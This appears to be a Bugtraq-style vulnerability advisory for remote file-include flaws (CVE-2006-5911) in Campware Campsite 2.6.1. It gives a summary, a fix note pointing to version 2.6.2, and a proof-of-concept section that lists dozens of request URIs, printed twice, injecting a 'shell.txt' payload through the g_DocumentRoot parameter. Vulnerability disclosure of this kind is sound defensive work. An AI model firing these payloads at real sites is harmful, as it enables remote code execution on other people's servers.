Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
BID:23874
Info
Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 23874 |
| Class: | Input Validation Error |
| CVE: |
2006-5911 |
| Remote: | Yes |
| Local: | No |
| Published: | May 08 2007 12:00AM |
| Updated: | May 09 2007 05:49PM |
| Credit: | The vendor disclosed these issues. |
| Vulnerable: |
Campware Campsite 2.6.1 |
| Not Vulnerable: |
Campware Campsite 2.6.2 |
Discussion
Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
Exploit / POC
Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/classes/Alias.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Article.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleComment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleData.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleImage.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleIndex.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticlePublish.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleTopic.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleType.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Attachment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Country.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/DatabaseObject.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Event.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Image.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Issue.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/IssuePublish.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Language.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Log.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/LoginAttempts.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Section.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ShortURL.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Subscription.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SystemPref.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Template.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Topic.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/UrlType.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/UserType.php?g_DocumentRoot=shell.txt?
http://www.example.com/configuration.php?g_DocumentRoot=shell.txt?
http://www.example.com/db_connect.php?g_DocumentRoot=shell.txt?
http://www.example.com/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt?
http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt?
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/classes/Alias.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Article.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleComment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleData.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleImage.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleIndex.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticlePublish.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleTopic.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleType.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Attachment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Country.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/DatabaseObject.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Event.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Image.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Issue.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/IssuePublish.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Language.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Log.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/LoginAttempts.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Section.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ShortURL.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Subscription.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SystemPref.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Template.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Topic.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/UrlType.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/UserType.php?g_DocumentRoot=shell.txt?
http://www.example.com/configuration.php?g_DocumentRoot=shell.txt?
http://www.example.com/db_connect.php?g_DocumentRoot=shell.txt?
http://www.example.com/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt?
http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt?
Solution / Fix
Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
Solution:
The vendor released an advisory and updates to address this issue. Please see the associated references for more information.
Campware Campsite 2.6.1
Solution:
The vendor released an advisory and updates to address this issue. Please see the associated references for more information.
Campware Campsite 2.6.1
-
Campware Campsite 2.6.2
http://sourceforge.net/project/showfiles.php?group_id=66936
References
Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- 2.6.2 Release Notes (Campware)
- Campware Web page (Campware)
- Changeset 6057 (Campware)
- Changeset 6058 (Campware)
- Milestone 2.6.2 (Campware)
- Ticket #2349 (Campware)